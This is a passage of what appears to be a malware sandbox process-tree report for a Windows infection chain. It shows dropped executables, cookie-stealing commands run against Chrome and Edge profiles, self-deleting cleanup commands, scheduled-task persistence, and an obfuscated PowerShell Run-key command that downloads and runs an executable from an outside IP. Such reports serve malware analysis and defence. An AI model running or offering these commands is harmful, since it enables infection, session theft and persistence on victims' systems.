                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im knBsnnt1K2bbtlihIKPbeg9X.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\knBsnnt1K2bbtlihIKPbeg9X.exe" & del C:\ProgramData\*.dll & exit
                                                                                            3⤵
                                                                                              PID:2828
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /im knBsnnt1K2bbtlihIKPbeg9X.exe /f
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:3560
                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                timeout /t 6
                                                                                                4⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:3596
                                                                                          • C:\Users\Admin\Documents\1mdwmFsg9Xll6gwwjLLOekvP.exe
                                                                                            "C:\Users\Admin\Documents\1mdwmFsg9Xll6gwwjLLOekvP.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2456
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "1mdwmFsg9Xll6gwwjLLOekvP.exe" /f & erase "C:\Users\Admin\Documents\1mdwmFsg9Xll6gwwjLLOekvP.exe" & exit
                                                                                              3⤵
                                                                                                PID:1784
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /im "1mdwmFsg9Xll6gwwjLLOekvP.exe" /f
                                                                                                  4⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:3888
                                                                                            • C:\Users\Admin\Documents\M7G6pBSoTOMnnI9zM2rSsq4g.exe
                                                                                              "C:\Users\Admin\Documents\M7G6pBSoTOMnnI9zM2rSsq4g.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:2444
                                                                                            • C:\Users\Admin\Documents\I8BYHQrOAlotPOlP9KEE8mhA.exe
                                                                                              "C:\Users\Admin\Documents\I8BYHQrOAlotPOlP9KEE8mhA.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2428
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "I8BYHQrOAlotPOlP9KEE8mhA.exe" /f & erase "C:\Users\Admin\Documents\I8BYHQrOAlotPOlP9KEE8mhA.exe" & exit
                                                                                                3⤵
                                                                                                  PID:2984
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im "I8BYHQrOAlotPOlP9KEE8mhA.exe" /f
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:3928
                                                                                              • C:\Users\Admin\Documents\4PSJgjJW5ovjulN9aeU4dUGJ.exe
                                                                                                "C:\Users\Admin\Documents\4PSJgjJW5ovjulN9aeU4dUGJ.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Program Files directory
                                                                                                PID:2416
                                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3804
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3008
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3572
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    4⤵
                                                                                                      PID:2712
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                      4⤵
                                                                                                        PID:3744
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        4⤵
                                                                                                          PID:3796
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                          4⤵
                                                                                                            PID:3040
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            4⤵
                                                                                                              PID:2292
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                              4⤵
                                                                                                                PID:3400
                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3840
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3888
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2108
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                4⤵
                                                                                                                  PID:3376
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  4⤵
                                                                                                                    PID:8804
                                                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3832
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 276
                                                                                                                    4⤵
                                                                                                                    • Program crash
                                                                                                                    PID:3876
                                                                                                              • C:\Users\Admin\Documents\v5YKstlbFqUvDuWklc89fTOo.exe
                                                                                                                "C:\Users\Admin\Documents\v5YKstlbFqUvDuWklc89fTOo.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:2408
                                                                                                                • C:\Users\Admin\Documents\v5YKstlbFqUvDuWklc89fTOo.exe
                                                                                                                  "C:\Users\Admin\Documents\v5YKstlbFqUvDuWklc89fTOo.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3620
                                                                                                              • C:\Users\Admin\Documents\Elifck94G8eZlXwV3vDgx8mI.exe
                                                                                                                "C:\Users\Admin\Documents\Elifck94G8eZlXwV3vDgx8mI.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2360
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-LNQ4S.tmp\Elifck94G8eZlXwV3vDgx8mI.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-LNQ4S.tmp\Elifck94G8eZlXwV3vDgx8mI.tmp" /SL5="$201BA,138429,56832,C:\Users\Admin\Documents\Elifck94G8eZlXwV3vDgx8mI.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Modifies system certificate store
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  PID:2832
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-8CIR5.tmp\Setup.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-8CIR5.tmp\Setup.exe" /Verysilent
                                                                                                                    4⤵
                                                                                                                      PID:3688
                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                        5⤵
                                                                                                                          PID:3812
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            6⤵
                                                                                                                              PID:3120
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              6⤵
                                                                                                                                PID:3700
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                6⤵
                                                                                                                                  PID:3136
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  6⤵
                                                                                                                                    PID:3776
                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                  5⤵
                                                                                                                                    PID:4000
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                      6⤵
                                                                                                                                        PID:3508
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                      5⤵
                                                                                                                                        PID:2884
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1505854.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1505854.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:3556
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\2803174.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\2803174.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:3628
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:9196
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\8505997.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\8505997.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:2680
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7363229.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7363229.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:2840
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 1616
                                                                                                                                                      7⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4088
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:3816
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-Q8M26.tmp\GameBoxWin32.tmp
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-Q8M26.tmp\GameBoxWin32.tmp" /SL5="$302D0,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:3764
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-SVOR1.tmp\Daldoula.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-SVOR1.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                                                                          7⤵
                                                                                                                                                            PID:3284
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\f1-44910-645-0fcb5-705475ac8c0e0\Laetywoxemi.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\f1-44910-645-0fcb5-705475ac8c0e0\Laetywoxemi.exe"
                                                                                                                                                              8⤵
                                                                                                                                                                PID:1576
                                                                                                                                                                • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:2632
                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2632 CREDAT:275457 /prefetch:2
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:1964
                                                                                                                                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:2864
                                                                                                                                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2864 CREDAT:275457 /prefetch:2
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:3256
                                                                                                                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                          "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:5980
                                                                                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5980 CREDAT:275457 /prefetch:2
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:6076
                                                                                                                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5980 CREDAT:5059587 /prefetch:2
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:9016
                                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5980 CREDAT:3683340 /prefetch:2
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:8536
                                                                                                                                                                                • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                  "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:8896
                                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8896 CREDAT:275457 /prefetch:2
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:8444
                                                                                                                                                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:8488
                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 8488 -s 392
                                                                                                                                                                                          10⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:8692
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\b4-5e18d-192-79290-665b4c096efa6\Nishepywane.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\b4-5e18d-192-79290-665b4c096efa6\Nishepywane.exe"
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:3472
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\khhma2vb.epf\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:2776
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0yvffbqz.kxa\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:3796
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0yvffbqz.kxa\installer.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\0yvffbqz.kxa\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:1724
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zttf0irg.4l3\ufgaa.exe & exit
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:2436
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\zttf0irg.4l3\ufgaa.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\zttf0irg.4l3\ufgaa.exe
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:2584
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xwxuahpg.nvz\anyname.exe & exit
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:3184
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\xwxuahpg.nvz\anyname.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\xwxuahpg.nvz\anyname.exe
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:3912
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\xwxuahpg.nvz\anyname.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\xwxuahpg.nvz\anyname.exe" -q
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:2640
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nbbl20xw.5jn\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:3360
                                                                                                                                                                                                        • C:\Program Files\Common Files\TUVQIJRADG\ultramediaburner.exe
                                                                                                                                                                                                          "C:\Program Files\Common Files\TUVQIJRADG\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:1036
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-OLAJK.tmp\ultramediaburner.tmp
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-OLAJK.tmp\ultramediaburner.tmp" /SL5="$502AC,281924,62464,C:\Program Files\Common Files\TUVQIJRADG\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:2384
                                                                                                                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:3508
                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:3968
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 276
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              PID:2496
                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:2228
                                                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628118547 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:2244
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_4.exe
                                                                                                                                                                                                        sonia_4.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:1332
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0B4DC9B4\sonia_2.exe
                                                                                                                                                                                                        sonia_2.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                        PID:668
                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        PID:1616
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:1588
                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                        schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\PLA\Templates\System.exe'" /rl HIGHEST /f
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:3184
                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Documents and Settings\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:3276
                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                        schtasks.exe /create /tn "Elifck94G8eZlXwV3vDgx8mI" /sc ONLOGON /tr "'C:\Users\Admin\Documents\StartPush\Elifck94G8eZlXwV3vDgx8mI.exe'" /rl HIGHEST /f
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:3432
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\582E.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\582E.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:3440
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D8B4.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D8B4.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:2344
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EA22.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\EA22.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:2568
                                                                                                                                                                                                            • C:\ProgramData\Runtimebroker.exe
                                                                                                                                                                                                              "C:\ProgramData\Runtimebroker.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:3428
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91''+''.241''+''.19''+''.52/Ru''+''nt''+''im''+''ebr''+''oke''+''r.exe''),(''Vpnm.''+''e''+''xe''));Start-Process (''V''+''p''+''nm.exe'')'
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1376
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    "powershell" Get-MpPreference -verbose
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:2628
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F4FC.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F4FC.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2652
                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                    PID:3144
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:2052
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9293.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9293.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4052
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Forgesoft\FSU Admin Center\fsucenter.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Forgesoft\FSU Admin Center\fsucenter.exe"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:2020
                                                                                                                                                                                                                            • C:\ProgramData\Data\Database.exe
